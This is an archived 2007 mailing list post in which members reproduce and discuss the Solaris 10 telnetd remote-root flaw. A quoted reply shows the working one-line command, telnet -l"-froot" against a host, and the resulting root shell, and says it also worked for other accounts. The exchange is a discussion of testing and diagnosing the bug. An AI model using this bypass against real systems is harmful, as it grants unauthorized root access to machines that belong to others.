[geeks] Solaris 10 Remote-Root Exploit

Lionel Peterson lionel4287 at verizon.net
Mon Feb 12 12:08:46 CST 2007


>From: Doug McLaren <dougmc at frenzied.us>
>Date: 2007/02/12 Mon AM 11:43:48 CST
>To: The Geeks List <geeks at sunhelp.org>
>Subject: Re: [geeks] Solaris 10 Remote-Root Exploit

>On Mon, Feb 12, 2007 at 11:21:13AM -0600, Lionel Peterson wrote:
>
>| Just a few datapoints - anyone recreate this yet?
>
>Yes.

GREAT - thanks.

Now, a few questions:

1) Were you logged in as "root" or "non-superuser user"?

2) What is OS of Telent client you are using (Linux, Solaris, etc.)?

3) Is there any logical connection between the two machines (as I understand it "-f" sends credentials to telnetd, I want to make sure there is no connection between the two.

I am curious if you have two machines with identical root passwords when this is successful...

Thanks for the datapoints - I really do appreciate it.

Lionel
>% telnet -l"-froot" sunspot
>Trying 10.18.80.89...
>Connected to sunspot.
>Escape character is '^]'.
>Last login: Fri Feb  9 14:37:41 from lenny.vignette.
>Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
>
>==============================================================
>Oracle 10.2.0.1.0
>...
>#
>
>It also worked on different accounts as well.
>
>Now, this box does allow telnets in as root (intentionally, as it's a
>sandbox type box) so maybe that's relevant.  It's probably not
>anywhere near up to date on patches either.
>
>(It also seems to work OK when done with a `telnet -l -froot sunspot',
>for another data point.)
>
>-- 
>Doug McLaren, dougmc at frenzied.us
>Kill -9 'em all, let root at localhost sort 'em out.
>_______________________________________________
>GEEKS:  http://www.sunhelp.org/mailman/listinfo/geeks



More information about the geeks mailing list